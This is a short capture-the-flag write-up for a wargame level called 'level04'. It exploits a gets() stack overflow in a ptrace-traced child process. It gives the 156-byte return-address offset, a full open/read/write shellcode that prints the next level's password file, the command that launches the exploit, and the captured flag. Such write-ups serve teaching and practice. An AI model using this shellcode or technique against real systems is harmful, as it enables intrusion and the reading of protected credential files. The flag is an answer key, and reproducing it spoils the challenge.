### Explanations
In this level, we see yet another buffer overflow, due to the use of the __gets() function__.

We only need 32 bytes to fill the whole buffer and, after a bit of investigating, we see that we need to write __156 bytes to get control over the _main()_ function's return address__.

Though there is a fundamental difference compared to previous levels:
At the very beginning, a __child process with a new PID is created__ by using _fork()_.
This child process is then __traced using _ptrace()___. At this point, if any call to _exec()_ is done by the child process, __it will get stopped__.

The goal here is to send a shellcode __only containing syscalls__ (in this case, open, read and write). When executed, the following shellcode will not start a shell but will instead display the content of _"/home/users/level05/.pass"_.

```
$ export PAYLOAD3=$(python -c 'print "\x90"*40 + "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x32\x5b\xb0\x05\x31\xc9\xcd\x80\x89\xc6\xeb\x06\xb0\x01\x31\xdb\xcd\x80\x89\xf3\xb0\x03\x83\xec\x01\x8d\x0c\x24\xb2\x01\xcd\x80\x31\xdb\x39\xc3\x74\xe6\xb0\x04\xb3\x01\xb2\x01\xcd\x80\x83\xc4\x01\xeb\xdf\xe8\xc9\xff\xff\xff/home/users/level05/.pass"')
```

We can execute the payload with `python -c 'print "A"*156 + "address of our env variable" + "\n"' | ./level04`

### Flag
`3v8QLcN5SAhPaZZfEasfmXdwyR59ktDEMAwHF3aN`
